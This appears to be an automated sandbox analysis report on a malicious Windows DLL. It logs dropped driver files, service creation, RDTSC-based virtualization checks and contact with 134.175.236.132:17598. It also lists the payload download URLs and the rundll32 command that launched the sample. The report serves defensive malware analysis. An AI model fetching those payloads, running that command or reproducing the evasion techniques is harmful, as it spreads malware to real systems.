Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[1] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[2] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xz[1] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[2] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[1] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1340820F.sys Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1341015D.sys Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xz[1] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[1] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[1] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[2] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[2] Jump to dropped file
Creates or modifies windows services
Source: C:\Windows\SysWOW64\rundll32.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\1341001C Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 6E095961 second address: 6E095972 instructions: 0x00000000 rdtsc 0x00000002 cmp di, ax 0x00000005 mov dword ptr [ebp-2Ch], 45303030h 0x0000000c xchg dx, cx 0x0000000f rcr ch, cl 0x00000011 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 6E095972 second address: 6E09597F instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-28h], 00000001h 0x00000009 bsf ax, cx 0x0000000d rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 6E096F51 second address: 6E096F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esp 0x00000004 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 6E096F55 second address: 6E096F5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 xchg dword ptr [esp+40h], eax 0x00000007 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E091E11 rdtsc 3_2_6E091E11
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ECA49D7.sys Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[1] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[2] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xz[1] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[2] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[1] Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1340820F.sys Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1341015D.sys Jump to dropped file
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000 Jump to behavior
Source: rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: rundll32.exe, 00000003.00000002.2082938982.0000000000939000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2082938982.0000000000964000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2039142851.0000000000964000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2054642510.0000000000724000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2054642510.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt"

Anti Debugging
barindex
Potentially malicious time measurement code found
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E096F39 Start: 6E096F51 End: 6E096F5C 3_2_6E096F39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E095950 Start: 6E09597F End: 6E095972 3_2_6E095950
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E091E11 rdtsc 3_2_6E091E11

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 134.175.236.132 17598 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll",#1 Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1416972 Sample: SecuriteInfo.com.Win32.Evo-... Startdate: 28/03/2024 Architecture: WINDOWS Score: 96 42 Antivirus / Scanner detection for submitted sample 2->42 44 Multi AV Scanner detection for dropped file 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 3 other signatures 2->48 7 loaddll32.exe 1 2->7         started        process3 process4 9 rundll32.exe 10 18 7->9         started        14 cmd.exe 1 7->14         started        16 rundll32.exe 10 20 7->16         started        18 conhost.exe 7->18         started        dnsIp5 40 134.175.236.132, 17598, 49705, 49706 CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa China 9->40 30 C:\Users\user\AppData\Local\...\1341015D.sys, PE32+ 9->30 dropped 32 C:\Users\user\AppData\Local\...\xz[1], PE32+ 9->32 dropped 34 C:\Users\user\AppData\Local\...\xz[1], PE32+ 9->34 dropped 36 C:\Users\user\AppData\Local\...\xz[1], PE32+ 9->36 dropped 52 Sample is not signed and drops a device driver 9->52 54 Tries to detect virtualization through RDTSC time measurements 9->54 56 Potentially malicious time measurement code found 9->56 20 rundll32.exe 10 21 14->20         started        38 C:\Users\user\AppData\Local\...\7ECA49D7.sys, PE32+ 16->38 dropped 58 System process connects to network (likely due to code injection or exploit) 16->58 file6 signatures7 process8 file9 24 C:\Users\user\AppData\Local\...\1340820F.sys, PE32+ 20->24 dropped 26 C:\Users\user\AppData\Local\...\xz[2], PE32+ 20->26 dropped 28 C:\Users\user\AppData\Local\...\xz[2], PE32+ 20->28 dropped 50 Sample is not signed and drops a device driver 20->50 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
134.175.236.132
 unknown China
45090 CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa true

Contacted Domains

Name IP Active
fp2e7a.wpc.phicdn.net 192.229.211.108 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://134.175.236.132:17598/xz?mz=PmlHousProMax.sys true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://134.175.236.132:17598/xz?mz=PmlHousPro.sys true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://134.175.236.132:17598/xz?mz=Pml.bin true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown